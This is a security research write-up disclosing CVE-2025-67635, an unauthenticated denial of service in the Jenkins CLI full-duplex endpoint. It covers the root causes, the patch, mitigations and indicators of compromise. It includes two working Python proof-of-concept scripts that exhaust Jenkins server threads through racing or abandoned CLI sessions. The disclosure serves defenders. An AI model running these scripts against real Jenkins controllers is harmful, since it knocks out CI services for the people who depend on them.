CVE-2025-67635: Unauthenticated DoS in the Jenkins CLI full-duplex endpoint

1150 words

6 minutes

CVE-2025-67635: Unauthenticated DoS in the Jenkins CLI full-duplex endpoint

2025-12-12

Security Research

security

/

jenkins

/

dos

/

java

/

concurrency

/

cli

TL;DR#

Jenkins’ plain CLI endpoint (/cli?remoting=false) pairs two POST requests (download/upload) via a shared Session UUID and is reachable without Overall/Read.
Two bugs stack: an unsynchronized HashMap in CLIAction drops one half of the session (race condition), and the CLI protocol wait loops (ServerSideImpl.run, FullDuplexHttpService.upload) have no timeout.
Attackers can finish their HTTP calls in milliseconds yet strand Jetty threads for 15s (race window) or indefinitely (abandoned protocol), causing controller-wide asymmetric DoS.
Affects core ≤ 2.540 and LTS ≤ 2.528.2 (CWE-362/CWE-404, CVSS 7.5). Fixed in 2.541 / 2.528.3 by using ConcurrentHashMap, adding handshake timeouts, and closing streams on error.
Mitigate now: upgrade, or block the plain CLI endpoint from untrusted networks, capture thread dumps to confirm no threads sit in CLIAction$ServerSideImpl.run or FullDuplexHttpService.upload/download.

What the endpoint does#

The non-Remoting CLI builds a full-duplex channel from two HTTP POSTs:

Download side: Side: download, opens cli?remoting=false, server writes a byte and waits for the upload half.
Upload side: Side: upload, same Session UUID, provides the input stream.

hudson.cli.CLIAction wires this to jenkins.util.FullDuplexHttpService, storing active sessions in a cross-request registry.

Root cause #1 - unsynchronized session registry (race condition)#

CLIAction keeps the session map in a plain HashMap shared by all request threads:

1
// core/src/main/java/hudson/cli/CLIAction.java:83
2
private final transient Map<UUID, FullDuplexHttpService> duplexServices = new HashMap<>();

FullDuplexHttpService.Response.generateResponse does services.put(uuid, service) for the download side, and services.get(uuid) for the upload side. Because HashMap is not thread-safe, concurrent puts/gets under load can:

Return null for a valid download side
Drop entries during a resize
Leave download threads inside FullDuplexHttpService.download waiting up to 15 s for an upload that already arrived

Result: every racy pair ties up a servlet thread for the full timeout while the attacker’s sockets close immediately, causing an asymmetric DoS and violating REQ-337 (“Make critical logic flows thread safe”).

Root cause #2 - missing protocol timeouts (deterministic hang)#

Even when the two halves pair correctly, the protocol handshake can deadlock because neither side times out:

1
// core/src/main/java/hudson/cli/CLIAction.java:300
2
synchronized (this) {
3
    while (!ready) {      // waits forever if client never sends "start"
4
        wait();
5
    }
6
}
7
// core/src/main/java/jenkins/util/FullDuplexHttpService.java:145
8
while (!completed) {       // no deadline if download side dies early
9
    wait();
10
}

If the client drops the connection before sending CLI frames, the download thread blocks in ServerSideImpl.run() and the upload thread blocks in upload() with no timeout, consuming two Jetty threads per attempt until the controller is exhausted.

Exploitation notes#

Both vectors require only network reachability to /cli:

Scenario A (race condition): fire overlapping download/upload pairs with slight jitter so the upload half occasionally sees null. Threads pile up in FullDuplexHttpService.download for ~15 s each.
Scenario B (abandonment): open both halves, let them pair, then close without sending CLI frames. Threads stay in CLIAction$ServerSideImpl.run and FullDuplexHttpService.upload indefinitely, no timing window needed.

Below are the exact PoCs shared with the Jenkins security team:

PoC: racecond_a.py (HashMap race, two downloads per UUID)#

1
#!/usr/bin/env python3
2
import requests
3
import uuid
4
import concurrent.futures
5
import sys
6

7
def create_download(jenkins_url, session_id, session):
8
    headers = {'Session': session_id, 'Side': 'download'}
9
    try:
10
        response = session.post(
11
            f"{jenkins_url}/cli?remoting=false",
12
            headers=headers,
13
            data=b'',
14
            timeout=20
15
        )
16
        return response.status_code
17
    except requests.exceptions.Timeout:
18
        return 'TIMEOUT'
19
    except Exception:
20
        return 'ERROR'
21

22
def main(jenkins_url, num_sessions):
23
    session = requests.Session()
24
    adapter = requests.adapters.HTTPAdapter(
25
        max_retries=0,
26
        pool_connections=200,
27
        pool_maxsize=200
28
    )
29
    session.mount('http://', adapter)
30
    session.mount('https://', adapter)
31

32
    with concurrent.futures.ThreadPoolExecutor(max_workers=200) as executor:
33
        futures = []
34

35
        for i in range(num_sessions):
36
            session_id = str(uuid.uuid4())
37
            futures.append(executor.submit(create_download, jenkins_url, session_id, session))
38
            futures.append(executor.submit(create_download, jenkins_url, session_id, session))
39

40
        timeouts = 0
41
        for future in concurrent.futures.as_completed(futures):
42
            if future.result() == 'TIMEOUT':
43
                timeouts += 1
44

45
    print(f"Timeouts: {timeouts}/{num_sessions*2}")
46

47
if __name__ == "__main__":
48
    jenkins_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8081"
49
    num_sessions = int(sys.argv[2]) if len(sys.argv) > 2 else 1000
50
    main(jenkins_url, num_sessions)

PoC: racecond_b.py (protocol abandonment, deterministic hang)#

1
#!/usr/bin/env python3
2
import socket
3
import struct
4
import uuid
5
import time
6
import threading
7
import sys
8

9
JENKINS_HOST = "localhost"
10
JENKINS_PORT = 8081
11

12
OP_ARG = 0
13
OP_LOCALE = 1
14
OP_ENCODING = 2
15

16
def send_cli_frame(sock, opcode, data=b""):
17
    if isinstance(data, str):
18
        data = data.encode('utf-8')
19
    length = len(data)
20
    frame = struct.pack('>I', length) + struct.pack('B', opcode) + data
21
    sock.sendall(frame)
22

23
def establish_download(session_id, duration=30):
24
    try:
25
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
26
        sock.connect((JENKINS_HOST, JENKINS_PORT))
27
        request = f"""POST /cli?remoting=false HTTP/1.1\r
28
Host: {JENKINS_HOST}:{JENKINS_PORT}\r
29
Session: {session_id}\r
30
Side: download\r
31
Content-Length: 0\r
32
Connection: keep-alive\r
33
\r
34
"""
35
        sock.sendall(request.encode())
36
        response = b""
37
        while b"\r\n\r\n" not in response:
38
            chunk = sock.recv(1)
39
            if not chunk:
40
                return False
41
            response += chunk
42
        sock.recv(1)
43
        time.sleep(duration)
44
        sock.close()
45
        return True
46
    except Exception:
47
        return False
48

49
def establish_upload_without_start(session_id, duration=30):
50
    try:
51
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
52
        sock.connect((JENKINS_HOST, JENKINS_PORT))
53
        request = f"""POST /cli?remoting=false HTTP/1.1\r
54
Host: {JENKINS_HOST}:{JENKINS_PORT}\r
55
Session: {session_id}\r
56
Side: upload\r
57
Transfer-Encoding: chunked\r
58
Connection: keep-alive\r
59
\r
60
"""
61
        sock.sendall(request.encode())
62
        response = b""
63
        while b"\r\n\r\n" not in response:
64
            chunk = sock.recv(1)
65
            if not chunk:
66
                return False
67
            response += chunk
68
        send_cli_frame(sock, OP_ARG, "help")
69
        time.sleep(0.05)
70
        send_cli_frame(sock, OP_LOCALE, "en_US")
71
        time.sleep(0.05)
72
        send_cli_frame(sock, OP_ENCODING, "UTF-8")
73
        time.sleep(duration)
74
        sock.close()
75
        return True
76
    except Exception:
77
        return False
78

79
def create_abandoned_session(session_id, duration=30):
80
    download_thread = threading.Thread(
81
        target=establish_download,
82
        args=(session_id, duration),
83
        daemon=True
84
    )
85
    download_thread.start()
86
    time.sleep(0.3)
87
    upload_thread = threading.Thread(
88
        target=establish_upload_without_start,
89
        args=(session_id, duration),
90
        daemon=True
91
    )
92
    upload_thread.start()
93
    return download_thread, upload_thread
94

95
def main(num_sessions):
96
    threads = []
97
    for i in range(num_sessions):
98
        session_id = str(uuid.uuid4())
99
        download_t, upload_t = create_abandoned_session(session_id, duration=60)
100
        threads.extend([download_t, upload_t])
101
        time.sleep(0.1)
102

103
    for t in threads:
104
        t.join()
105

106
    print(f"Created {num_sessions} sessions")
107

108
if __name__ == "__main__":
109
    num_sessions = int(sys.argv[1]) if len(sys.argv) > 1 else 500
110
    main(num_sessions)

Evidence#

Thread dump (Scenario B, Jenkins 2.516.2 test controller) – stuck in the exact call sites with no timeout:

1
at hudson.cli.CLIAction$ServerSideImpl.run(CLIAction.java:319)
2
- locked <0x00000000f0d9ba90> (a hudson.cli.CLIAction$ServerSideImpl)
3
at jenkins.util.FullDuplexHttpService.download(FullDuplexHttpService.java:119)
4

5
at jenkins.util.FullDuplexHttpService.upload(FullDuplexHttpService.java:146)
6
- locked <0x00000000f0d9aaa0> (a hudson.cli.CLIAction$PlainCliEndpointResponse$1)
7
at jenkins.util.FullDuplexHttpService$Response.generateResponse(FullDuplexHttpService.java:191)

Video evidence: end-to-end crash reproduction against a fresh controller:
On a vulnerable build you will see dozens of request threads waiting in those call sites, and regular CLI calls start timing out.

Impact#

Unauthenticated DoS: no Overall/Read required to hit /cli?remoting=false.
Low attacker cost: sockets close immediately, the server holds the work (15 s per race attempt, infinite for abandonment).
Controller-wide degradation: servlet threads and I/O streams back up, other endpoints time out.

Patch details (core commit efa1816)#

CLIAction now stores sessions in a ConcurrentHashMap, removing the racy HashMap drops that powered the asymmetric DoS.
ServerSideImpl.run and FullDuplexHttpService.upload adopted CONNECTION_TIMEOUT-bounded waits with 1s wake-ups and DEBUG logs, so abandoned handshakes unwind instead of parking threads.
PlainCLIProtocol always calls side.handleClose() in a finally block, ensuring both halves tear down even on read errors or runtime exceptions.
Regression coverage landed in Security3630Test (JUnit 5): it shrinks the CLI timeout for tests, exercises the previous race with concurrent CLI invocations, and asserts threads are released after truncated streams.
Net effect: the CLI download/upload pairing now fails fast and frees Jetty threads instead of blocking indefinitely on missing counterparts.
The changes bring the full-duplex CLI path back into compliance with REQ-337: “Make critical logic flows thread safe.”

CVE and advisory references#

SECURITY-3630 is assigned CVE-2025-67635 (CVSS 3.1: AV/AC/PR/UI/S/C/I/A). See the CNA record on cve.org and the NIST entry on NVD for canonical metadata.
Jenkins’ official write-up: Jenkins Security Advisory 2025-12-10: SECURITY-3630.

Fix and hardening#

If you cannot upgrade immediately:

Disable or firewall the plain CLI endpoint, prefer the WebSocket CLI with proper auth.
Lower Jetty thread caps only as a last resort (does not remove the bug).
Monitor thread dumps for CLIAction$ServerSideImpl.run and FullDuplexHttpService.upload/download wait states.

Indicators of compromise#

Repeated IOException: No download side found for <uuid> in logs.
Thread dumps showing many TIMED_WAITING at FullDuplexHttpService.download or WAITING at CLIAction$ServerSideImpl.run / FullDuplexHttpService.upload.
Spikes in /cli?remoting=false requests lacking authentication headers.

Patch promptly, this is a cheap, network-reachable DoS path in default Jenkins deployments.